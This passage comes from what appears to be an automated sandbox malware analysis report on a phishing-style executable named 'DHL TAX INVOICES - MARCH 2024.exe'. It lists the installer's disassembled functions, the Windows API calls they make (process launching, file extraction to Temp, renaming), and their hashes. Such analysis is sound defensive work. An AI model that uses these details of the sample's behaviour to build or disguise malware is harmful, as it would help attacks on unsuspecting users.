                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Local\releve
                                                            • API String ID: 542301482-2510609794
                                                            • Opcode ID: 591e162b48f8759b5b2692d799258728b1136979a7dcee4b3aef57e1d8159fc5
                                                            • Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
                                                            • Opcode Fuzzy Hash: 591e162b48f8759b5b2692d799258728b1136979a7dcee4b3aef57e1d8159fc5
                                                            • Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 51f18150437c144cd66edcff000563471467b4270039c502952ea3edf421ef17
                                                            • Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
                                                            • Opcode Fuzzy Hash: 51f18150437c144cd66edcff000563471467b4270039c502952ea3edf421ef17
                                                            • Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004043DF Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040447D
                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404491
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044AE
                                                            • GetSysColor.USER32(?), ref: 004044BF
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
                                                            • lstrlenW.KERNEL32(?), ref: 004044E0
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040455B
                                                            • SendMessageW.USER32(00000000), ref: 00404562
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040458D
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
                                                            • SetCursor.USER32(00000000), ref: 004045E1
                                                            • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 004045F6
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
                                                            • SetCursor.USER32(00000000), ref: 00404605
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404634
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: ExecToStack$N$VC@$open
                                                            • API String ID: 3615053054-1699886250
                                                            • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                            • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
                                                            • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                            • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                            • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                            • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                            • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405EAD Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405EBC
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00406040,?,?), ref: 00405EE0
                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
                                                              • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                              • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                            • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
                                                            • wsprintfA.USER32 ref: 00405F24
                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                            • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040600D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
                                                              • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405D57
                                                              • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                            • API String ID: 222337774-899692902
                                                            • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                            • Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
                                                            • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                            • Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1000194F Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 83processstringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCommandLineW.KERNEL32(00000400), ref: 1000197F
                                                            • lstrcpynW.KERNEL32(?,00000000), ref: 1000198D
                                                            • CharNextW.USER32(00000022), ref: 100019BA
                                                            • CharNextW.USER32(00000022), ref: 100019C5
                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 100019EA
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100019FC
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 10001A09
                                                            • CloseHandle.KERNEL32(?), ref: 10001A18
                                                            • CloseHandle.KERNEL32(?), ref: 10001A1D
                                                            • ExitProcess.KERNEL32 ref: 10001A22
                                                            • ExitProcess.KERNEL32 ref: 10001A2D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1636824093.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636907483.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636928724.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636977025.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                            • String ID: "$D
                                                            • API String ID: 3771911414-1154559923
                                                            • Opcode ID: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                            • Instruction ID: 04ec7ee55fd1c5b75376eb32569bf43fe38d23ed250b13e4565c7e467344e8e5
                                                            • Opcode Fuzzy Hash: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                            • Instruction Fuzzy Hash: 2521217180025DBEFB10EB94CD98AEF7BBDEB04385F504066E206B60A5DB701E55DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406412 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                            • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                            • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                            Strings
                                                            • "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe", xrefs: 00406412
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
                                                            • *?|<>/":, xrefs: 00406464
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-1918633348
                                                            • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                            • Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
                                                            • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                            • Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004042A9 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004042C6
                                                            • GetSysColor.USER32(00000000), ref: 004042E2
                                                            • SetTextColor.GDI32(?,00000000), ref: 004042EE
                                                            • SetBkMode.GDI32(?,?), ref: 004042FA
                                                            • GetSysColor.USER32(?), ref: 0040430D
                                                            • SetBkColor.GDI32(?,?), ref: 0040431D
                                                            • DeleteObject.GDI32(?), ref: 00404337
                                                            • CreateBrushIndirect.GDI32(?), ref: 00404341
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                            • Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
                                                            • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                            • Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                              • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4A
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                            • String ID: 9
                                                            • API String ID: 163830602-2366072709
                                                            • Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                            • Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
                                                            • Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                            • Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                            • GetTickCount.KERNEL32 ref: 00402DD8
                                                            • wsprintfW.USER32 ref: 00402E06
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
